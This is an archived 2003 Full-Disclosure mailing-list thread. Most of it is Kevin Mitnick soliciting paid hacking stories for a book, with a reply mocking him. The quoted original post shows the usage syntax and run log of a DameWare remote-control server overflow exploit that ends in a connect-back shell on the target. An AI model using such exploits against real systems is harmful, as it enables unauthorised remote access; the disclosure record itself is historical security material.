lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <001201c3c69d$84e48600$3200000a@alex>
From: jkuperus at planet.nl (Jelmer)
Subject: [Exploit]: DameWare Mini Remote Control Server
 Overflow Exploit

In that case you probably will want to update your site
http://www.defthi.com/main/CallforHackers.html since it mentions another
arangement


----- Original Message ----- 
From: "Kevin Mitnick" <kmitnick@...thi.com>
To: "'Jelmer'" <jkuperus@...net.nl>; "'Adik'" <netninja@...mail.kg>;
<full-disclosure@...ts.netsys.com>; <bugtraq@...urityfocus.com>
Sent: Saturday, December 20, 2003 1:56 AM
Subject: RE: [Full-Disclosure] [Exploit]: DameWare Mini Remote Control
Server Overflow Exploit


> The difference is that I'm offer a $500 for the best story of a single
hack,
> and I'm willing to pay $200 for each story that makes the final draft.
>
> Markoff would not agree to pay one dime.
>
> Cheers,
>
> Kevin Mitnick
>
> Check out http://www.zdnet.com.au for the story
>
>
> -----Original Message-----
> From: full-disclosure-admin@...ts.netsys.com
> [mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of Jelmer
> Sent: Friday, December 19, 2003 4:03 PM
> To: Kevin Mitnick; 'Adik'; full-disclosure@...ts.netsys.com;
> bugtraq@...urityfocus.com
> Subject: Re: [Full-Disclosure] [Exploit]: DameWare Mini Remote Control
> Server Overflow Exploit
>
> If this is legit
>
> from a /. interview :
>
> --snip--
> John Markoff had first libeled me in his book, Cyperpunk, which he
> co-authored with his former wife, Katie Hafner. In and around 1990,
Markoff
> and Hafner contacted me to request my participation for a book about three
> hackers, including myself. In considering their request, I asked about
their
> budget to compensate me for my time and/or life story rights. Both Markoff
> and Hafner were unwilling to compensate me as a source, because it was
> unethical. I explained that it was unethical for me to give them my story
> for free. We were at an impasse
> --snip--
>
> from the site :
>
> --snip--
> If your story makes it into the book, you'll receive a free copy of my
first
> book, The Art of Deception, plus a rare Advanced Reader's Copy of the new
> one with your story in it -- both signed by me with a personal inscription
> to you in your real name or your handle or pseudonym.
> --snip--
>
> Thats definatly more ethical ;)
>
>
> ----- Original Message ----- 
> From: "Kevin Mitnick" <kmitnick@...thi.com>
> To: "'Adik'" <netninja@...mail.kg>; <full-disclosure@...ts.netsys.com>;
> <bugtraq@...urityfocus.com>
> Sent: Saturday, December 20, 2003 12:30 AM
> Subject: RE: [Full-Disclosure] [Exploit]: DameWare Mini Remote Control
> Server Overflow Exploit
>
>
> > Hi all!
> >
> >
> > I'm sorry for my absence from the list for the past few months, but I
have
> > been very busy traveling outside the US, and my mail account was
> > experiencing problems.  Now that I am receiving the messages again, I
have
> > been playing "catch up," by reading the old posts.
> >
> > I do have some good news, and was hoping that some of you might be able
to
> > assist me.  I have been commissioned by Wiley & Sons to write a second
> book,
> > which is tentatively titled, "The Art of Intrusion."  This book will
> > chronicle detailed accounts of real, untold hacks by the perpetrators
who
> > did it, and I will provide a security analysis and described how the
> attack
> > could be mitigated/prevented in today's environment.  I am going to tell
> the
> > story from the perpetrator's stance, not just from research obtained
from
> > law enforcement officials and records.
> >
> > I am looking for former/retired hackers that would be willing to tell me
> the
> > details of their sexiest hack.  I am not interested in the
run-of-the-mill
> > attacks such as, exploiting RPC DCOM, but rather creative ones that
> > incorporated technical, physical and/or social engineering aspects.
> >
> >
> >
> > I am offering $500 for the most provocative story that makes it into the
> > book, and if the person wishes, we can protect their anonymity by the
use
> of
> > a handle.  All contributors selected for the book, will receive a copy
of
> > both books autographed by the authors.
> >
> > I should have more information up on FreeKevin.com today, as well as
> > DefensiveThinking.com.  If someone would like to contact me with a story
> or
> > a possible lead on a storyteller, please write to me at
> > hacks@...ensivethinking.com, or call at (310)689-7229.  I would
appreciate
> > any assistance you can offer.
> >
> > All my best,
> >
> >
> >
> > Kevin Mitnick
> >
> > -----Original Message-----
> > From: full-disclosure-admin@...ts.netsys.com
> > [mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of Adik
> > Sent: Friday, December 19, 2003 8:38 AM
> > To: full-disclosure@...ts.netsys.com; bugtraq@...urityfocus.com
> > Subject: [Full-Disclosure] [Exploit]: DameWare Mini Remote Control
Server
> > Overflow Exploit
> >
> > DameWare Mini Remote Control Server Exploit
> >
> > C:\xploits\dmware>dmware
> >
> >         ...oO DameWare Remote Control Server Overflow Exploit Oo...
> >
> >                 -( by Adik netmaniac[at]hotmail.KG )-
> >
> >  - Versions vulnerable: <= DWRCS 3.72.0.0
> >  - Tested on: DWRCS ver: 3.72.0.0 Win2k SP3 & WinXP SP1
> >
> >  Usage: dmware <TargetIP> <TargetPort> <YourIp> <YourPort>
> >  eg: dmware 10.0.0.1 6129 10.0.0.2 21
> >
> >
> > C:\xploits\dmware>dmware 192.168.63.130 6129 192.168.63.1 53
> >
> >         ...oO DameWare Remote Control Server Overflow Exploit Oo...
> >
> >                 -( by Adik netmaniac[at]hotmail.KG )-
> >
> >  - Versions vulnerable: <= DWRCS 3.72.0.0
> >  - Tested on: DWRCS ver: 3.72.0.0 Win2k SP3 & WinXP SP1
> >
> > [*] Target IP:  192.168.63.130  Port: 6129
> > [*] Local IP:   192.168.63.1    Listening Port: 53
> >
> > [*] Initializing sockets...                     [ OK ]
> > [*] Binding to local port: 53...                [ OK ]
> > [*] Setting up a listener...                    [ OK ]
> >
> >  OS Info   : WIN2000 [ver 5.0.2195]
> >  SP String : Service Pack 3
> >
> >  EIP: 0x77db912b (advapi32.dll)
> >
> > [*] Constructing packet for WIN 2000 SP: 3...   [ OK ]
> > [*] Connecting to 192.168.63.130:6129...        [ OK ]
> > [*] Packet injected!
> > [*] Connection request accepted: 192.168.63.130:1056
> > [*] Dropping to shell...
> >
> > Microsoft Windows 2000 [Version 5.00.2195]
> > (C) Copyright 1985-2000 Microsoft Corp.
> >
> > C:\WINNT\system32>exit
> > exit
> > [x] Connection closed.
> >
> > C:\xploits\dmware>
> >
> > ------
> > cheerz,
> >
> > Adik
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ